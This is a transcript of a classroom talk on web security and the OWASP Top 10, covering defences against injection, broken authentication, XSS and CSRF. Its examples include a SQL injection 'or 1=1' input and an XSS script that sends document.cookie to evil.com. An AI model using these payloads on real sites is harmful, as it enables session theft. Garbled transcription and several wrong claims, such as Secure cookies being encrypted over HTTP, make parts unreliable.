Good morning all, and this talk is on Websecurity and OWASP, one of the most important topic in software development, and this will be presented by myself, Isuru. So let's go ahead and see the agenda, and this is the agenda for you. So what is Websecurity and why? Introduction to OWASP, then we'll have a deep dive into OWASP top 10, and if time permits, we'll go ahead and see these two topics, OWASP security testing tools, general security testing tools, and Q&A. So what is web security and why we need it? Here we mainly focus on security of websites, web applications, and web services. Now with the emergence of Web 2.0, many applications have been added to the web, and number of internet users have reached around 4 billion. It's an astronomical number. Now proportional to this adoption, number of vulnerabilities also increased, right? So intruders exploit these vulnerabilities through techniques like SQL injection, cross-site scripting, etc. And if you take attacker profiles, right, those are either well-organized groups or maybe nation states, right? So folks, it's imperative that we provide adequate security for web applications. Now, these are the recent catastrophic security hacks happened in the recent past. Sony Entertainment in 2011, 77 million accounts, credit card numbers were compromised. And JP Morgan Chase in 2014, 7.6 million account information was leaked. And MasterCard in 2005, 40 million accounts were leaked, right? So folks, security vulnerability is the business risk. The moment your site is hacked, customers will lose trust with the application, and they are reluctant to input their credit card information to the website, right? Not only that, to restore your application to the original state, you have to spend a couple of dollars to multiple dollars, right? So always it's better to have necessary security checkpoints and techniques in your applications. Okay. So what is OWASP? So has anybody heard about OWASP? Yes, please. Yeah, what is that? Okay, it's OWASP stands for Open Web Application Security Project, and the website is www.owasp.org, right? And it's a non-profit organization interested in web security, and it's open community as well. If you take organizations like Apache, right, those are interested in in open source software. Likewise, OWASP is interested in web security. A defined set of vulnerabilities, threats, attacks, and countermeasures, including code samples. Basically, this OWASP is trying to standardize security for you. Okay, and it has a couple of documentation projects. One is development guide, and the other one is the testing guide, and there's another one called code review guide. Right? And using these guides, you can fine-tune your software development life cycle. Right now, if you take development guide, you can come up with better code by applying security aspect for your code, right? Normally when you code, you are reluctant to think about security aspect, but if you go through this documentation, you can come up with a better code on security, on considering security in your code base. And there's another guide called testing guide. So for testers, they can come up with a better testing framework by considering security aspect. Now normally testers are reluctant to think about the security aspect, right? But if you go through this documentation project, right, you can come up with a better testing plan considering security as well. And there's another project called code review guide. So this code review guide is for the code reviewers, right? So when you review a code, normally people think about syntax, semantics, and algorithms. But if you follow this code review guide, you can come up with a better code review plan considering security aspect as well. And there's another development project done by OWASP, which is web code sample web application. Now this application is made to be vulnerable deliberately, right? So when you perform certain exercises on this in this vulnerable application, you can come up with a fully fledged application with security enabled. Basically, it's a learning platform. So you download this application and can play around with that. You can understand how security vulnerabilities are transpiring and how you apply fixes for them. Okay. And there are a couple of mail lists in OWASP, right? Let's say you have innovative idea on security, and let's say you want to brainstorm certain idea, and let's say you have a resolution for available vulnerability or better resolution. So you can brainstorm these things in this mail list, and you can come up with a conclusion. So you can jump into this mail list and find those things. Not only that, there's a newsletter for you. So if you subscribe to this newsletter, you can get security updates, new patches, new security vulnerabilities. So you can be updated on what is happening on security arena, right? And there are many more projects under this OWASP umbrella. So I just give a few points on OWASP. Okay, if you have any questions on OWASP, you can ask me now. No. Okay, so based on criticality and frequency of occurrence. OWASP has defined 10 vulnerabilities. It is called OWASP top 10. Okay, so the most recent release of top 10 is in 2017 June, and this list is keeping on updating, right, based on situation in the industry. So this is the OWASP top 10 as per 2017 specification. So injection, broken authentication and session management, cross-site scripting, broken access control, security misconfiguration, sensitive data exposure, missing function level access control, cross-site request forgery, using components with known vulnerabilities and underprotected APIs. So that is the OWASP top 10 vulnerabilities. Has anybody come across this set of vulnerabilities? No. Okay. So number one of OWASP top 10 is injection, right? Normally this attack happens when you send untrusted data into the system. So this can be performed by internal and external parties, and these are text-based attacks, right? So if you take type of injection attacks, you can have SQL injection, LDAP injection, JPQL injection, XPath injection, NoSQL injection, right? And there are many more. This is a typical example for a SQL injection attack, right? Basically, a simple your query may be a simple query. Select all from user data where last name is equal to the last name, and let's say corresponding hybrid query, create query from user data where last name is equal to last name, right? Now, what malicious potential attacker does is, instead of passing legitimate data, he may try to pass malicious data, right? So last name is equal to or 1 equal 1. So here what is happening is you are tricking the underlying interpreter. So underlying SQL will be like this. Instead of fetching a particular row for you, it will display all the records for you. So this is SQL injection, right? So let's see how you can prevent injection, right? So the best solution is avoiding dynamic query, but if you consider today's applications, you can't avoid dynamic queries, right? So other solution is use parameterized queries. In Java you have prepared statements, and in .NET world you have SQL command, I guess, right? SQL commands, and PHP world you have PHP data objects, right? So if you use those statements, you can get rid of this SQL injection vulnerability. And possible, wherever possible, use stored procedures instead of using plain SQL, right? And always you validate your input, right? That will definitely raise the bar for the attacker. Okay. And if you don't have any API, let's say you're using a language like Ruby or Python, right, where you are not sure about the existing API, in that case you can use OWASP APIs. Now OWASP has provided APIs to escape your input data, right? So OWASP Enterprise Security API. So this is how we do it in Java. ESAPI.encode encode for SQL, new Oracle codec, query parameter. So if you use Oracle codec, you can encode only inputs for Oracle. Likewise, you can have codecs for Postgres, many other databases, right? So that's how you prevent SQL injection. And if yes, go ahead. Yes, it's in the server. Yes.
So normally how an attacker comes to the server?
No. It goes through the input fields. Input fields, right? Let's say your last name input field, you input, and in the back end it will be interpreted in the wrong manner. Okay. So always it is advised to use good code analysis tools, right? There are many code analysis tools which detects SQL injections into an application, right? You can use tools like SQL Map, right? That's a prominent tool which is used in the industry. So if you go to this OWASP cheat sheet, you can get a better picture on how SQL injection is happening and how SQL injection is prevented, right? So in your free time, you can download this documentation and go through it. Okay, number 2 of OWASP top 10 is broken authentication and session management. Now here we basically talk about the flaws in authentication module and session management. 90% of the time you come up with your own authentication module and session management module, right? So there can be numerous flaws incorporated in your modules. Now these are some of them. Credentials not protected with hashing. Normally you don't. There may be scenarios you store your credentials in plain data, right? And so those are vulnerable for inside attacks. And credentials can be guessed. If you don't have your proper password policy, right? Then through social engineering attacks, your password can be guessed. And session ID exposed in the URL lead to session fixation. Now session fixation is described in the diagram on your right side, right? So as an attacker, first I log into the application and get the session ID. Now session ID is in the URL, right? Now what I'll do is I'll get login URL I'll append my session ID and I'll throw it to the victim whom I want to be victimized. Okay. So when you click on the URL, he'll log into the application using his credentials. So once he log in using my session ID, then attacker becomes the victim. Attacker can log in and do whatever you want. Once your session ID is compromised, the game is over. Okay. So that's session fixation. Session ID won't time out, so that's another drawback in majority of the applications. And session IDs are not protected on successful logins. So if you log into the same application multiple times, server is supposed to send multiple or different login IDs for you, different session IDs for you. Okay. All right. Now in authentication management, what is important is protecting the password. Right. The password is highly sensitive data when it comes to web application development. Right. So when you protect a password, you have to consider three areas. One is hashing, transport layer security, and storage. Hashing, you use the best algorithms, but doesn't mean that your password is secure. The moment your password leaves the user agent, you are putting it in the network, which is quite unsecure, right? And it may pass across several network nodes. Even if you have enabled SSL, there are things which can go wrong. We'll discuss them in later slides. Storage, obviously, you store your password in proper format, and you have to maintain certain discipline when you do password storage. So these are the ways you can crack your password hash. Dictionary attacks, right? Now dictionary is it's a large collection of password hashes against the plain password. So when attacker find the password hash, he can go through the dictionary and find the correct password. Right? This is one way of cracking the password hash. And brute force attack, you can try multiple combinations of certain text and see whether it is matching in the user database. Right? So this is another way. And lookup table is it's a dictionary, but the data structure they use is lookup table, which is much more efficient than general dictionaries. And finally, this is the widely used attack type, rainbow table, right? It's a high performance lookup table with gigabytes of data, and they use high performance CPUs to crack, let's say, to process, let's say, 1 million hashes per second. So using this rainbow table, you can crack around 1 million hashes per second, not crack, process. Okay. So when you do hashing, you have to remember that you have to put salt. If you simply hash, it's not going to work. It can be easily cracked. Okay. So when you do hashing, one rule of thumb is you have to incorporate salt. Without salt, hashing is equal to not hashing. Okay. This is a typical user registration with salt incorporated. Okay. So first, user enters the username and then password. Then server generates a random salt. For each user, you have to generate a random salt when you at registration. And the server computes the hash, then server stores. This is a typical database layout for user registration in terms of authentication model. Okay, user ID, salt, and hash. You have to generate unique salt per user. Without salt, hashing is not going to work. It can be easily crackable using the aforementioned techniques. So this is the simplified login flow. So user posts the username, and so look up the salt, right? Then so compute the hash with the salt and see whether it is existing in the database. And if all is good, you are allowed to log in. Okay. All right. Now let's say the password database is attacked. Right. So attacker, let's say password database is stored in a different machine, and your general business data is stored in a different machine. Right. So somehow one attacker grab the password. Attacker stole the password data. Okay. Okay. This is the victim's hash. So okay, it's properly hashed with random salt and hash. So what attacker can do to enter the application? He can generate an arbitrary password. Let's say he used the text "let me in" and he used the salt. Now he has access to the salt, right? And he generates the hash and it's stored, and he can easily log in. You got the point? Yes. So how do we prevent this? How do you prevent? Anyway, anybody can suggest. Prevent. Okay. The solution is use a global key. Use application security key. It's so use two things for hashing. One is the salt and the application security key, right? You use two things for hashing. Now in that case, how attacker is deterred from generating a new hash? How? Because he doesn't have access to the secret, right? The secret is in the application, but the attacker has cracked the password database, right? The attacker doesn't have access to the application data, right? So in that case, he can't generate a new password for him. But
Where is the application key?
it can be in the application property file.
But still,
No, only password database is there. The main server is not there, but the password database is there. Okay. So do you think this is secure? So what else the attacker can think of? Yes. Yeah, what else? He can create an arbitrary account and log in, and he can use that password and he copy it to the other one along with the salt. Now, through that way he can log in. Still he can log in, right? So folks, so this is the hashing recipe for you. Always when you hash, you use application secret, the hash and the random salt, and you have to bind user ID to the password. So in that case, he can generate password for the victim. Okay. And in your left side, you will find the algorithms which are already gone, right? MD5, SHA-1 encryption, base64 encoding, ROT13. If you have used these things, please revert them to the new things. You can use bcrypt, PDKF2, and Argon2 or script, right? Those are the modern password hashing algorithms. And remember, when you use these password hashing algorithms, you have to use the salt and the applicant secret, plus you have to bind your password to the user account. Otherwise, it is vulnerable to many attacks. Okay. So, any questions on password hashing? Yeah. Now, do you understand this scenario?
Yeah, I got it now.
Yeah.
When the attacker attacks his database, he can create an arbitrary account and
Yes.
So
So when it decrypts, it looks for the user ID. So he can't generate arbitrary hash without knowing how user ID is bound to the hash.
that algorithm is holding the application.
Algorithm, yeah, you can store in values. Okay. So if you have used old algorithm, please revert them to new ones. Okay, bcrypt, PDKF2, script, and Argon2. Those are the new password hashing. Okay. Now hashing itself does not guarantee the security of the password, right? The moment it leaves a user agent will put on the network, which is quite unsecure, right? So this is a typical flow of password in the network. So you have user agent, then in the DMZ you have proxy, right? Then front end, login server. So in the login server, your password may get locked, right? Even if you use SSL, SSL is peer-to-peer. So in the below diagram, you will see how SSL secure your password. In the network, SSL will protect your password. In the host level, it will protect your password. In the OS level, it will protect your password. Once it reaches the web server, using libraries in the server, it will be decrypt, right? So from that point, password is open. Right? If it is locked at the server, it will lock the plain text password, right? So how do you prevent this? Any solution? You have to protect your password from user agent to the server to prevent this kind of logging. Now your objective is to prevent logging in the login server in the plain text format.
use one-time password using browser or something?
No, we use username and password. Plain username and password. I'm talking about this scenario.
To protect the existing password.
Yes.
And,
join the script token. Single one-time password.
Yes, so how do you generate the token? Solution, simple solution. So you, for any this, you just need to Zyper, right? When is the log, encryption is one solution. So before you go to the encryption and pass, normally when you come to password, you rarely talk about encryption. You talk about hashing. Why you can't hash? Right? You can hash from the use agent. So hash from the use agent, you should be able to hide the information from the user, right? So hashing alone, now hashing. Now when you use hashing, the next word coming to the mind is what? Salt. So how do you generate salt? The use agent. Use agent, you don't know the salt. The moment you log in or you register, you don't know the salt, right? So that's why you go for encryption. So encryption, when you do encryption, now here symmetric encryption is not encouraged, right? You have to use asymmetric encryption. If you use symmetric encryption, key is stolen, game is over, right? You use asymmetric encryption when you encrypt your password from password which is transmitted from user agent to the browser, to the server. Okay. So how do you perform asymmetric encryption? What is the difference between symmetric encryption and asymmetric encryption? Exactly. So what you do is you encrypt your password using the login server's public key, right? And you send it to the server, and even if it is SSL, even if it's logged, you will see the encrypted value. Okay. But still, there is a problem with that. Still, this is vulnerable for replay attack. You can replay the request, but if you use SSL, replay attacks can be avoided, right? So you can just disregard replay. Okay. Okay, so these are general password generation policies, right? Always it is encouraged the password length to be in length between 0 to 128, and password complexity you have to follow this kind of rules according to OWASP. At least one uppercase character, at least one lowercase character, at least one digit, at least one special character, space is a special character. So, and also not more than 2 identical characters in a row. So those are the things you should consider when you come up with a password, right? I'm just including those things because those are mentioned in OWASP. Otherwise, you might have already used these things. When you give an authentication error message, just respond with the generic error message, right? Don't give any clues to the attacker, right? So this is the correct response example: login fail, invalid user ID or password. So likewise, you just reduce the information to the user when it comes to authentication logins. Right? So to prevent brute force attacks, you can employ measures like account lockout. After let's say 5 attempts, you can simply lock out the account. And always you can come up with multi-factor authentication, and I am sure everybody is familiar with multi-factor authentication. And always it's good to log and monitor your application. If you find unnecessary spikes in your application, you can take necessary measures. You can block the IPs or you can block the account, right? And always it's encouraged to use this federated authentication mechanism, both OpenID, SAML, where you send your password to dedicated server instead of sending everywhere, right? So your password will get additional protection, so you can raise the bar for the attacker, okay? And always it's encouraged to leverage available frameworks and tools. You know, Apache Zero is one of the wonderful authentication and authorization framework for Java, right? It supports authentication, authorization, session management, encryption, everything, right? And Spring Security and OWASP API is another available security framework. You can always leverage on those things. And if you want more information on authentication management, you can go to this cheat sheet, which is from OWASP. In your free time, you can read them all. Alright, now we're done with authentication management. Let's see how you prevent your session management issues, right? So in most of the applications, you'll see this kind of implementations in the deployment environment. You log in using SSL, right? Once you log in, you redirect your normal business application to the normal non-HTTPS manner, right? Now, do you find any issue here? You log in using HTTPS, and after the login, you redirect for HTTP for rest of the communication. Yes, session ID can be intercepted, right? Moment your session ID is intercepted, game over, right? You have to protect the session ID, so it is advised if you use HTTPS, use across all your communication. Okay, it's a grave mistake to have HTTP and HTTPS together in a single application. So you are vulnerable. can be an easy target. Okay. So this is another typical example where people get wrong on session management. Let's say you use HTTPS, right? For your banking application, you use HTTPS. So what you do is you type HTTPS your bank.com, good, and all your communication is secure, right? And let's say you instead of typing in the URL in Google, you search your bank and you click on the URL. In Google, it may return the HTTP URL instead of return the HTTPS. So once you click on HTTP, it will go to the server. Right? Server will identify this as HTTP request and will send back the 302 response, asking the user to redirect to the HTTPS port. Right? There you will see a vulnerability. Right? When user response is 302, right? The malicious attacker or potential attacker can intercept this message and he can redirect to one of the arbitrary website which is resembling as your bank website, and you can input password and can be compromised. Okay? So how do you prevent this? To prevent, you have to enable HTTP strict transport layer of security. Right? So what it does is it will sit in front of your SSL layer. If there is any HTTP request, it will upgrade the request to HTTPS and will ensure the required protection for your application, so that you will never get HTTP responses from your server, right? And this is in security control. It instructs the browser to upgrade the security for STS or the HTTP strict transport layer security, right? So if your application is mission critical, right, you have to use HSTS. SSL will not safeguard you in that context. Okay. So HSTS forces all communications is over HTTPS, and no insecure HTTPS request sent from browser, and no option for user to override untrusted certificate. Now, if you use SSL, there are scenarios that the browser prompts you to accept this certificate or something like that. You may have encountered, right? But if the server is HSTS enabled, you will never get. Simply the request will be rejected. Okay. So it is advised to use HSTS if application is mission critical, or you can suggest to your customer that HSTS is the way to go because they are dealing with sensitive data. So this is how you enable HSTS in Apache. So you can use this .htaccess file, and you can insert this text. Header always set strict transport security, set max in age 300 include subdomain. So max age is the time in second that the browser should remember that site is only be accessed using HTTPS. For this time period, site will be accessed using HSTS. And also you can include subdomains. So if subdomains are accessed, then those will be upgraded to HSTS. And this can be performed in IIS, NGINX servers as well, right? And this is a widely adopted mechanism in most of the critical applications. So to prevent session management issues, as I mentioned earlier, you can enable HSTS, and when it comes to cookies, always we can use secure, right? So if your connection is HTTP or HTTPS, your cookie will be encrypted when it is transmitted over wire. And you can use HTTP only, right? So when you use HTTP only, what's happening? Only browser can read the cookie, right? Using document.cookie, you don't get the value, it will return null. Okay. Okay, always you can use this cache control, no cache, no store, pragma, no cache, and new session IDs on consecutive login is the advanced technique to prevent session management issues. You can configure your server to transmit different logins, different session IDs for different logins. Okay. So these are your OWASP cheat sheets to manage authentication and session management. You can go through these documents in your free time, right, and see how you can come up with a better authentication and session management implementations. So cross-site scripting. Has anybody heard about cross-site scripting? This is the number 3 vulnerability of OWASP top 10. Right now, these are text-based attacks, text-based attack scripts that exploit and interpret the browser. Simply, you will execute malicious scripts in the browser and you steal the session cookie. Okay, so this is a typical example for cross-site scripting. Let's say this is a forum website. So attack adds the following comment: get price for great item. Read my review here. As a forum comment, you put hackersite.com autostealer.js, and in the JS we have this thing, document location http://evil.com id document.cookie. So each time this page is accessed, your cookie is transmitted to this evil website. Okay, this is how you expose cross-site scripting vulnerability, and you can perform cross-site scripting vulnerability on HTML as well. Let's say you have the website URL usage equal, it will get the username, and it will print. So instead of passing legitimate data, malicious attacker can insert plain HTML. Simply it will be interpreted like this, right? So you get the HTML injection attacks like that. So once you click on login password, you can transmit the password. So this is another way of exploiting excesses. So how do you prevent excesses? The solution is escape, right? Now in the frameworks you use .NET, Struts, Spring, right? In all the frameworks, excesses prevention is already done. So you don't need to bother about preventing excesses, okay? So you can, this is the OWASP way of preventing excesses. You can always encode ESAPI.encode and encode for HTML if you have any input. So in that way you can encode, and if you are not trusting existing API, it's better to incorporate. On top of the existing API, you can incorporate OWASP API as well. It always enhances security. It will always raise the bar for the attacker, right? And always escape JavaScript if you use dynamic JavaScript, right? So the API method to encode JavaScript, you encode for JavaScript because there are no input. So you encode for JavaScript. And if you do any DOM manipulation, it is advised to perform both JavaScript encoding and HTML encoding, right? And in CSS escape, so use the API method is API.encode and encode for CSS. So dynamic CSS will be encoded in a way that malicious CSS will never get executed from there. And also URL escaping also advised, right? So this is the ESAPI encode for URL method, right? So in that way you can encode the URL. Now all this escaping happens, data is sending back to the browser. But when data is coming to the server, also you can block the request if containing malicious data. So use these filters for that. So block request with dangerous tag script. If the input contains script tag, alert tag, you can always block so that it won't come into the server. So you can use these filters for that. And OWASP Anti-SAMI project is a project which specifically targets for HTML and CSS encoding, right? So you can download this project and you can play. This is not widely used simply because it's mentioned in OWASP. I'm telling it to you. And HTML sanitizer project, if you heavily use HTML, right, then it's better to protect them, better to clean them, right, and before you dump into the server, dump into the client. So, and if you go to this cheat sheet, you can get more information about cross-site scripting. So, number 4 of OWASP top 10 is broken access control. Right, here we mainly talk about unprivileged function access and unprivileged data access. Right, now in your applications you might have URLs like this: example.com app/getappinfo, example.com app/admin/getappinfo. Right, now for a general user, you should not allow admin/getappinfo. Right, it is not advised. And also unauthorized data access. So let's say you have a URL like this: bank.com show account ID is equal to 101. Right. So you are accessing 101 account by passing some other's account. You are allowed to see the account details, which is not proper way of implementing data security. Okay. So these two dimensions are addressed by OWASP as well. So to prevent these kind of things, you can come up with access control matrix before you come up with your security implementation. You come up with the proper access control matrix and you update them regularly, right? And you can always perform access check in your code. Always when you perform action, you should consider two things. First, access to the function and access to the underlying data. If you simply scope at accessing function, you are leaving the second vulnerability, which is unauthorized data access, right? So always you check both function access and data access. And do not assume that users will be unaware of special or hidden URLs. Now in the unprivileged function access scenario, if user can or the implementer can assume that admin/getappinfo will not be accessed, it will never be accessed by ordinary user. So that is wrong, right? You should not do that kind of things. Always regular penetration tests are advised, and regular audits, code review, automated verification. So unit testing is one way of verifying the access control matrix all the time. And principle of least privilege, always you should give the required sufficient privilege for the user to cope with the system, right? You should never give enhanced privilege, right? And principle of defense in depth, use multiple security mechanisms, right? To check both the function level access and data level access when you perform a certain operation, right? So you can go to these cheat sheets and you can get an idea how you implement fixes for broken access control. And number 5 of OWASP top 10 is security misconfiguration, right? So it can happen at any level. In web server, you may have allowed direct listing. So the moment malicious attacker comes, you can see the direct listing, right? That's one misconfiguration. In the app server, you may have allowed sample applications along with your production application. If you haven't removed sample application, if there is a vulnerability, you can easily crack into the server, right? And in the database, you may have left default passwords, right? So those are security misconfiguration you find in modern web applications. And also out of date software. If you don't update your software regularly, right, it is also open for vulnerability. And unnecessary ports and services. So in your production environment, if you have opened TP or telnet port unnecessarily, it's a vulnerability. The attacker can conduct various type of attacks, right? And error messages throws stack trace. So if your application is throwing stack trace to the user, right, the application is vulnerable heavily, because stack trace is a gold mine for attacker, right? It may display file paths, the languages used, right? So always you should try to avoid throwing of stack trace to the user. And framework settings to the secure values. So you have to go through this documentation of the respective softwares and set the security settings appropriately, right? So to prevent security misconfiguration, you can do frequent audits, right? And also you can have a deployment process, like automated deployment process, and always you can have automated configuration, automate configuration validity. Once your configuration is done, you can have automated tools to verify the configuration is correct. So these are the OWASP cheat sheets that's available to secure your configuration, to protect the application from security misconfigurations. Okay. Number 6 of OWASP top 10 is sensitive data exposure. Right now, here we deal with deal with the sensitive data, right, which are normally passwords and credit card numbers. Right, those can be in transit or in rest. And this vulnerability happens due to not encrypting of sensitive data. Right, if you don't encrypt your password, if you don't encrypt your credit card, it's a vulnerability, right? And use weak keys and algorithms to encrypt. Even you encrypt, you might have used weak algorithms, right? And SSL not enabled in the entire path, right? So you have to enable SSL in all the applications, right? So to prevent sensitive data exposure, you can come up with these measures. Encrypt the sensitive data accurately. So when you encrypt, you have to use the right algorithms. For instance, if you encrypt, better to use AES-256. It's advised to use AES-256, okay? And if you want to raise the bar for the attacker, you can always use a key encrypting key, right? You encrypt the key using another key. You may ask, the key encrypting key can also be hacked, right? But this key encryption key is generated from hardware security modules, right? Those are installed in data centers. The hardware which are stored in data centers, and it will generate tamper-proof keys for you, right? And don't store sensitive data unnecessarily, right? If you don't use your credit card, if you don't use user's credit card, don't store it, right? If it requires only for order processing, you process it and don't store it, right? If you store unnecessary data, then you are liable to protect them. So these are the cheat sheets for sensitive data exposure. In your free time, you can go through these things and okay. So number 7 of OWASP top 10 is insufficient attack protection. Right? Now here we talk about inability to detect, prevent, and respond to both manual and automated attacks. Right now, you should be able to detect attack scenarios. You should be able to distinguish between legitimate request and malicious request. Right? Always attack can use various tools to attack. Right? They will not stop attacking your system. Right? So they may use tools like OWASP SAP. Now OWASP has a tool called ZAP. Right? Using this tool, you can attack your application. Right? And you can use SQL injection vulnerability searching tools like SQL Map. Right? And also through manual human attacks, you can attack the application. Right? So to detect and respond to this kind of attacks, OWASP has a tool called OWASP App Sensor. It's a attack detection and prevention tool, right? So it will check whether input is a legitimate client can generate, and unusual usage patterns, repeated request spikes. So all these things can be detected by OWASP app sensor. Right? This is a production tool that is used in many applications. And that OWASP app sensor tool can itself respond to those malicious attacks. As responses, you can block the requests, and you can block IP ranges, and you can consider disabling monitoring misbehaving user accounts. And moment you find a vulnerability, it's better to patch quickly. It's advised to patch quickly. Okay. So this is another typical example where you are vulnerable for DOS attacks, right? So always you can flood the network, or you can flood the application layer server, right? Let's say your application has a functionality which generates large reports, right? So malicious attacker can generate this report in large scale through automated requests, right? So it is always good to monitor your production servers. You can monitor the log files. If you identify any anomalies, you should take necessary actions. And you can always configure OWASP app sensor to detect this kind of malicious request and respond accordingly. So this is the OWASP cheat sheets for intruder detection and prevention. So number 8 of OWASP top 10 is the cross-site request forgery. Has anybody heard about cross-site request forgery? This was among top 3 around 5 years ago. Its vulnerability is among top 3 5 years ago. Now it has gone down to number 8 vulnerability in the OWASP top 10. You have to remember that OWASP top 10 is not a constant, it's changing. Okay? Based on the industry situation, it's changing. This vulnerability was in number 3 around a couple of years ago. Now it has come to number 8. So what is cross-site request forgery? Here, the attacker is trying to trick the user using using URL. Okay, and through execution of this URL, you can let the user execute unwanted actions, and you can compromise the entire application. Right? Let's say there is a URL like this in your application, right? Example.com app transfer funds amount is equal to 1,100, destination account is 3. Now what attacker does is, attacker will email this URL with arbitrary accounts to the user. So when user clicks on this, at the time user is actually browsing the application, he can execute actions in this URL. So this is called cross-site request forgery. So how do you prevent CSRF? If you have implemented business application with sensitive operations, you might have implemented these things, right? How do you distinguish between legitimate request and malicious request in the server? Always you can, let's say you are dumping a form to the browser, so along with the form you can attach a token, right? So at each response, at each request to the server can match the token. So in this example, if malicious user emails the link without the token, then server will reject this request because it doesn't have the token.
Token is in part of it?
No, token can be sent as a hidden field. Server. Which? Yeah. You can come up with your own way. Now, the CSRF guard is also OWASP project that will generate token for you. So once you plug CSRF guard and configure, it will generate tokens for your forms. Right? So you don't need to do any code changes. You plug CSRF guard and it will do the job for you to prevent CSRF attacks. Okay?
Or response headers, they would have this cross-origin.
Yeah, it's a flag, right?
Yeah, they will
Not they enable, but these browsers are about it.
most new browsers
And
cross-site scripting.
yeah, that's another flag which is encouraged by OWASP we keep same site colon strict. Use that flag, you can prevent this kind of attacks as well. I didn't mention it because it's not widely supported by browsers, right? But you can keep in mind, you can always enable same site equal strict. That will prevent all the CSRF attacks. Browser support. If customers are willing to embrace same site, then use same site flag. It is another shortcut to achieve CSRF protection. Okay. And always good to re-authenticate. If you perform a mission critical business application, like in your bank, you may already encounter these things. When you do a transfer, in addition to your normal login, it will ask you to log in again. Right? That should prevent CSRF attacks. Okay. So you can go to these URLs and you get idea on how CSRF is happening and how you prevent those attacks. Right. So number 9 of OWASP top 10 is using components with known vulnerabilities. Right now, in your applications, you might be using several third-party libraries. Right? In Java, we use Java files. In .NET, I think it's DL, third-party DLs. In Ruby, we have gems. Right? So, but these libraries may have vulnerabilities. Now, these are the most common vulnerabilities encountered in the recent past. CXF authentication bypass. So, without providing identity token, CXF allowed to invoke web services with full permission, right? And there were around millions of downloads in this software. And Spring remote code execution. There is a language. There is a flow in the expression language flow, and using that flow, the attackers could execute arbitrary code on the server. And recently, Struts2 fixed the issue in file upload, right? So there is a flow in the content header type flow, and using that flow, attackers could execute arbitrary code on the server, right? So there were numerous scenarios that you use malicious libraries in your applications. So how do you prevent using component with known vulnerabilities? Before you use a component or third-party library, it's better to identify the dependencies along with security flows. Now OWASP has provided a nice tool for that. This is OWASP dependency check, right? Using that tool, you can identify the dependencies of a particular piece of software and the vulnerabilities. So it's good to use this tool, and it's good to adapt this tool. It will enable for you to have a secure third-party integration. And retire.js will help you to find out vulnerabilities in JavaScript. If you use third-party JavaScript, use this tool, and you can identify all the vulnerabilities in the JavaScript. And always it's a good practice to monitor security of components you are using. Always you can follow mailing list official sites, right? As a best practice, you should subscribe to this list and follow them. And good to have a security policy on third-party libraries. So when you incorporate third-party libraries, have a proper security policy. So you should come up with software development practices to use. If third-party library is throwing exception, are you going to use the same exception, or you're going to wrap it? You should come up with a proper policy, and you should have a policy to pass security tests. So when you incorporate a third-party library, what type of security test you have to pass, right? And acceptable licenses. Ensure when you incorporate things, incorporate third-party things, licenses are matching, right? It's not ethical to incorporate libraries which are not allowed to be used as third-party libraries. Okay, always check the licenses, and always as a practice, try to wrap and expose only the required functions in the API. Even you use large API, use what is required and wrap them, right? So that the developers will not use unnecessary stuff and have unnecessary implementations. Okay. And there is a prominent database of vulnerabilities, cd.midtrader.org, right? If you go to this site, you can search for vulnerabilities in many pieces of software you use, right? It's a vulnerability database, okay? So you can go to this OWASP URL if you want to get more information about using security components. Okay, the last one is underprotected APIs. Right now, in your applications, you might be using several third-party services, right? It can be REST, JSON, XML, right? You have to ensure that those things are protected well, right? So mobile app connecting to remote API, right? Now in your mobile app it is connecting to let's say banking server. So you have username and password, account number. So malicious attacker can decrypt the application and find out that you send the account number and can pass another account number which is not yours and grab the information. So that's a vulnerability. And public SMS JSON API. So you try to send SMS, it may be vulnerable to SQL injection attacks because it's not driven by you and we are using the API. And XML external entity injection, right? So when you deal with XML, it's vulnerable for XML external entity injection, right? So there's the entity tag, which is the entity tag, you can grab information in the server, right? So those kind of attacks exist for you to consider. So how do you prevent the vulnerabilities in unprotected APIs? Use secure communication between client and your APIs. You always don't use plain HTTP, at least use HTTPS, and if possible, provide a strong authentication scheme for your API, right? And parser configuration is hardened against that, and each and every parser has its own security flags, so you have to enable them appropriately. And you should protect against the injection of all forms. So there are many injection forms, SQL injection, as I mentioned earlier, XML entity injection. So protect your application from APIs from all these formats. So these are the OWASP cheat sheets available, so you can download them in your free time and see how you can protect your, how you can take measures on underprotected APIs. So that's it all. If you have any questions, you can raise them. Time is up. So we are on time. So, questions?
If the man uses HTTPS and then later you are integrated to HTTP, and if the application is stateless, you don't have to worry about session.
The ID, it's an ID.
It is session ID. And session ID is not a fact provider, it's stateless, right? Because there's nowhere the malicious user can.
Stateless is okay. Stateless is
So
okay.
it's okay to have.
Stateless is different. I'm talking about in general.
Yeah.
If you application, no, HTTP is stateless. There's an ID is there. Session ID is there.
Session ID generates on every request, but we are.
No, session ID is
on
not
the
generated
server.
on each request. Session ID is common. If session ID is stolen, game over, right? You can't have a proper application on that.
Cross-site request forgery. If I try to explore the token and it's embedded in the
How
can see the
No, you HTTPS, use HTTPS. You guys, interns, questions? Okay then, shall we wrap up then? Alright then, thanks for coming.